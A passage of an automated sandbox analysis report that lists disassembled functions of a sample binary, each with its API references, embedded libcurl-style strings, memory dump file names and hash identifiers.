    • schannel: ApplyControlToken failure: %s, xrefs: 00682B5B
    • schannel: shutting down SSL/TLS connection with %s port %hu, xrefs: 00682ABA
    • schannel: failed to send close msg: %s (bytes written: %zd), xrefs: 00682C8D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: schannel: ApplyControlToken failure: %s$schannel: failed to send close msg: %s (bytes written: %zd)$schannel: shutting down SSL/TLS connection with %s port %hu
    • API String ID: 1951014933-116363806
    • Opcode ID: 5b95c7b8d0a2308721edb843035baee35bfdd5321cfb39e68c9955265cba989e
    • Instruction ID: 2341a398f1cd3358c1813a94ad6238532a673f0a2d57aad5a64368f712f8aaca
    • Opcode Fuzzy Hash: 5b95c7b8d0a2308721edb843035baee35bfdd5321cfb39e68c9955265cba989e
    • Instruction Fuzzy Hash: 35E15BB5A00109AFCB14DF58D895FAEB7B6FF48304F148299E9196B392C731AD81CB90
    Function 0065F460 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00663A10: @_RTC_CheckStackVars@8.LIBCMT ref: 00663C1F
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065F793
    Strings
    • Couldn't resolve host '%s', xrefs: 0065F686
    • Unix socket path too long: '%s', xrefs: 0065F545
    • Couldn't resolve proxy '%s', xrefs: 0065F761
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Couldn't resolve host '%s'$Couldn't resolve proxy '%s'$Unix socket path too long: '%s'
    • API String ID: 930174750-3812100122
    • Opcode ID: 327dcbaa0dc4a3247920e7fefdab027b7212c3b78a595504c1410a21694541a6
    • Instruction ID: 34bdcaffae4ef1ac8e472290870e9a7deb4835f645e0fa63b04dff1631b1fa17
    • Opcode Fuzzy Hash: 327dcbaa0dc4a3247920e7fefdab027b7212c3b78a595504c1410a21694541a6
    • Instruction Fuzzy Hash: BDB18974A00209EFCB04CF98D885BEEB7B2EF88315F148179ED19AB351D771AA45CB91
    Function 0067CFA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 233COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0067D067
    • ___from_strstr_to_strchr.LIBCMT ref: 0067D087
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067D25D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr$CheckStackVars@8
    • String ID: .
    • API String ID: 2899561186-248832578
    • Opcode ID: ef529cb33147cda6c31fbfb343ac9ef002d827f9a8fd9e2e23cd80162fe057cc
    • Instruction ID: f9f2218fca4b2b125720b0cf7c652103f435c4ef324c058e324d6214ff6fb395
    • Opcode Fuzzy Hash: ef529cb33147cda6c31fbfb343ac9ef002d827f9a8fd9e2e23cd80162fe057cc
    • Instruction Fuzzy Hash: DCA1E371E042189FCF14CFA8D890BEDBBB2BF89304F148519E50ABB345D735A986CB64
    Function 006AB5A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr_strlen
    • String ID: ?
    • API String ID: 1576176021-1684325040
    • Opcode ID: 11507656709de9a271ac2b3f58b2cf3e09b8243df102f8ef20de4dcceb53f8a0
    • Instruction ID: 478f92b9256fcd7f8ca5ee7f34d93597d9cfde833f7a22774ebf334cdd09c32e
    • Opcode Fuzzy Hash: 11507656709de9a271ac2b3f58b2cf3e09b8243df102f8ef20de4dcceb53f8a0
    • Instruction Fuzzy Hash: E591A4B490438ACFCB05DF58C890BAE7BB2FF85304F144959E8259B346D375EA60CBA5
    Function 0064A1B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 192COMMON
    Download Yara Rule
    APIs
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0064A226
    • __allrem.LIBCMT ref: 0064A246
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0064A3C7
      • Part of subcall function 006BF9C0: _RTC_StackFailure.LIBCMT ref: 006BF9FD
    Strings
    • Internal error removing splay node = %d, xrefs: 0064A349
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Stack$CheckFailureUnothrow_t@std@@@Vars@8__allrem__ehfuncinfo$??2@
    • String ID: Internal error removing splay node = %d
    • API String ID: 825011786-2589534965
    • Opcode ID: f653be6b30606a759a62869b8c641a4c17c120f357567000e4e3e9f0f3746d8e
    • Instruction ID: cc14d0ddbcf0d707c8de6ac908088177a8ade68a0485ca731807501fac25a86e
    • Opcode Fuzzy Hash: f653be6b30606a759a62869b8c641a4c17c120f357567000e4e3e9f0f3746d8e
    • Instruction Fuzzy Hash: 22810DB5E002099FDB44DF98C881AAEFBB6FF48304F14C169E909AB351D735A981CF95
    Function 006D7AB3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
      • Part of subcall function 006D7248: GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 006D7290
    • WriteFile.KERNEL32(?,00000000,5C2E5C5C,?,00000000,?,00000000,00000000,00000000,?,58383025,?,00000000,?,5C2E5C5C,58383025), ref: 006D7C04
    • GetLastError.KERNEL32 ref: 006D7C0E
    • __dosmaperr.LIBCMT ref: 006D7C53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ConsoleErrorFileLastWrite__dosmaperr
    • String ID: \\.\%08X
    • API String ID: 251514795-2184389390
    • Opcode ID: 70e32ad302ab517f7e88234d7e6bb20d3fb2cbc75de4b981268f75df32fc9e51
    • Instruction ID: 1764ca69f96130a1c0e886abd3b08ef333f24b2fd68cc9348e95c4d94b76e905
    • Opcode Fuzzy Hash: 70e32ad302ab517f7e88234d7e6bb20d3fb2cbc75de4b981268f75df32fc9e51
    • Instruction Fuzzy Hash: 6D51B171E0820AAFDB109FA4C845FEEBBBAEF09314F14055BE400AB351F6749D41C766
    Function 006E04D1 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 006E0066: GetOEMCP.KERNEL32(00000000,006E02D8,?,al%08X,?,?,006C610D,58383025,00000000), ref: 006E0091
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,%08X,?,al%08X,006E031F,?,00000000,00000000,?,%08X), ref: 006E052F
    • GetCPInfo.KERNEL32(00000000,006E031F,?,al%08X,006E031F,?,00000000,00000000,?,%08X,?,?,?,?,006C610D,58383025), ref: 006E0571
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CodeInfoPageValid
    • String ID: al%08X$%08X
    • API String ID: 546120528-2095630812
    • Opcode ID: ef3f1aa4f5f304dfb8b1919b1e22e9403f6674cbdcaa79cb95fd8e41a7a570b9
    • Instruction ID: 80f977b218b063ab2074fa2336935262c1d75fd3fc61d8bbaac05a4ade833366
    • Opcode Fuzzy Hash: ef3f1aa4f5f304dfb8b1919b1e22e9403f6674cbdcaa79cb95fd8e41a7a570b9
    • Instruction Fuzzy Hash: FD51F7B0A013859EEB218F67C5407FBBBE7EF91304F14456ED0968B252E7B89586CF50
    Function 0065F090 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 164COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0065F200
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065F287
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8___from_strstr_to_strchr
    • String ID: %s%s%s
    • API String ID: 88142382-3094730333
    • Opcode ID: 6d676301559948fb8f16a80ec8862ed87bb6d26afcc1c3f71aac5f2729284e17
    • Instruction ID: e5102b173e1cec407aab3a027667fd74c35725ff9287236838d611372a2d7d65
    • Opcode Fuzzy Hash: 6d676301559948fb8f16a80ec8862ed87bb6d26afcc1c3f71aac5f2729284e17
    • Instruction Fuzzy Hash: D2615CB5D00208EFCB04DF98D894BEEBBB6BF44305F108169E915AB341D375AA85CF91
    Function 0069CB50 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069CD48
      • Part of subcall function 00683780: @_RTC_CheckStackVars@8.LIBCMT ref: 00683995
    • _strrchr.LIBCMT ref: 0069CBE8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$_strrchr
    • String ID: %s%s%s$(>p
    • API String ID: 2335863746-236696220
    • Opcode ID: fa42e95745714a37e411b71ab4942db6499f053ce7187d333edfe0402698d4ed
    • Instruction ID: 6b032e16747400a3d1f0ad3d8f3b8a3243df25de439f171d8f28888bae1cb861
    • Opcode Fuzzy Hash: fa42e95745714a37e411b71ab4942db6499f053ce7187d333edfe0402698d4ed
    • Instruction Fuzzy Hash: C0616DB0D00208EBDF14DF98D885BEEBBBABF48314F144169E5097B781D3749A85CB95
    Function 00673056 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 143COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00673B05
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Content-Length$Content-Length: %I64d$Failed sending PUT request
    • API String ID: 930174750-3178737968
    • Opcode ID: 241f744aa2f53d3186acf6fb21bf1f0389c148f293db149e7d25ba9aff12c5c4
    • Instruction ID: cdcff88950907f5e7804321b05c452f6ebcefa59275aa7e819b7bda418f4e3e8
    • Opcode Fuzzy Hash: 241f744aa2f53d3186acf6fb21bf1f0389c148f293db149e7d25ba9aff12c5c4
    • Instruction Fuzzy Hash: AA517C71E04318ABDB14DB94D882BEDB7B6AF44300F14C269E45DAB381E775AB81DF90
    Function 00670BF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00670DA2
    Strings
    • %s: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 00670D59
    • Invalid TIMEVALUE, xrefs: 00670C57
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: %s: %s, %02d %s %4d %02d:%02d:%02d GMT$Invalid TIMEVALUE
    • API String ID: 930174750-3467686708
    • Opcode ID: 5459174ff3861fbf02ceffff62dc81fa4836ad304fa88e558fda5ed9ad17fa5b
    • Instruction ID: dfce2d5a9b1f9003ca150c1b97c691752b2d23f959f8363a05e22e2ecc994f45
    • Opcode Fuzzy Hash: 5459174ff3861fbf02ceffff62dc81fa4836ad304fa88e558fda5ed9ad17fa5b
    • Instruction Fuzzy Hash: 46514EB5E00208EFDB54CF98D895BADB3B6AF48304F14C5A9E40DA7351D631AA85CFA1
    Function 00694440 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
    Download Yara Rule
    APIs
    • _strlen.LIBCMT ref: 0069448F
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: +$Got unexpected pop3-server response
    • API String ID: 3286693010-3277052657
    • Opcode ID: 41b0b3df2aa306eb2cf2a02baa4492f82ed86dced9df0264d7158f0c49d7fe00
    • Instruction ID: b01e0baf2263322cb7f65451de2ce4f05a96b5beea128fa4343487095a3dd51c
    • Opcode Fuzzy Hash: 41b0b3df2aa306eb2cf2a02baa4492f82ed86dced9df0264d7158f0c49d7fe00
    • Instruction Fuzzy Hash: 615149B1D00209DFCF04DFA8D891ABEBBB6FF48305F11815AD815AB341DB35AA42CB95
    Function 006A93B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: stale$true
    • API String ID: 1951014933-3006055996
    • Opcode ID: 3aacc9fa9958b87055353ad7d0683969e284c360a3b4267c1c677c2cd422fe8d
    • Instruction ID: f8d0889e4007006dff9d774ce6ede65530df1df7eddef5e99a6ba4ec91ea3e6b
    • Opcode Fuzzy Hash: 3aacc9fa9958b87055353ad7d0683969e284c360a3b4267c1c677c2cd422fe8d
    • Instruction Fuzzy Hash: 2B4170B5E041099BDB04EB54D891AFEB7F6EF4A305F248069E805AB341E634EE41CFB1
    Function 0066B6ED Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126COMMON
    Download Yara Rule
    APIs
    Strings
    • %zx%s, xrefs: 0066B7A2
    • Signaling end of chunked upload after trailers., xrefs: 0066B8A8
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %zx%s$Signaling end of chunked upload after trailers.
    • API String ID: 1951014933-1891671182
    • Opcode ID: 991171257fb44eab909792341d5b9d5e420d51235898b1f037da4bcf11d69fc9
    • Instruction ID: a29b34cccd11906e355b5162bb4b5800505b7407abc7bf6a90ea933b41e114f2
    • Opcode Fuzzy Hash: 991171257fb44eab909792341d5b9d5e420d51235898b1f037da4bcf11d69fc9
    • Instruction Fuzzy Hash: 495179B0E00248EFCB04DF94D890BEEBBB6BF45304F1841ADE449AB792D7319981CB91
    Function 00658F90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
    Download Yara Rule
    APIs
    Strings
    • -----END PUBLIC KEY-----, xrefs: 00659019
    • -----BEGIN PUBLIC KEY-----, xrefs: 00658FC8
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strstr
    • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----
    • API String ID: 2882301372-1157147699
    • Opcode ID: 6d9103c06a61fbd53fc8e397a65b5ff8c11d26d0cfb37865e95c29712e765dc2
    • Instruction ID: d4e708a2f0b116e2e796e760f8dfc4822ff33182f3c6e6a698c0523cb64b7fad
    • Opcode Fuzzy Hash: 6d9103c06a61fbd53fc8e397a65b5ff8c11d26d0cfb37865e95c29712e765dc2
    • Instruction Fuzzy Hash: D75135B0D0021ADFCF14DFA8C885BEEBBB2AF05305F148559E819AB341D735AA54CBA5
    Function 0066F461 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0066F270: _strlen.LIBCMT ref: 0066F28F
    • _strlen.LIBCMT ref: 0066F4B8
    • _strlen.LIBCMT ref: 0066F51B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066F5CF
    Strings
    • Hostname in DNS cache was stale, zapped, xrefs: 0066F58D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: Hostname in DNS cache was stale, zapped
    • API String ID: 3286693010-222773601
    • Opcode ID: ffa67b28c98e9e9d05874e0c129a5048d3fb7e9fe12fc3919c89b03d8883f013
    • Instruction ID: a276cb987e7b6febd9f99465e15b1dbc080e1a0c51629373fac346455a136f79
    • Opcode Fuzzy Hash: ffa67b28c98e9e9d05874e0c129a5048d3fb7e9fe12fc3919c89b03d8883f013
    • Instruction Fuzzy Hash: 1A4164F5E00209AFCB04DF94DC82BEEB3BABF48300F0485ADE51997341E671AA55CB94
    Function 0065D8D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 120COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065DA76
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Uses proxy env variable %s == '%s'$_proxy$http_proxy
    • API String ID: 930174750-1393905770
    • Opcode ID: 6e71eebcf1a0dc30953dbcff08c2046b468530e97f6be3dc9db55244ea440de6
    • Instruction ID: 89f2b0778ad7c2cd74ca903c5b46929ad8fe317dfd8a7979fff9ce896962adc0
    • Opcode Fuzzy Hash: 6e71eebcf1a0dc30953dbcff08c2046b468530e97f6be3dc9db55244ea440de6
    • Instruction Fuzzy Hash: BF511AB5D002189FDB60DF64D886BEDB7B6AF45305F1080E9E94DA7342EA316B88CF51
    Function 0067CE20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 114COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0067CE91
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067CF6C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
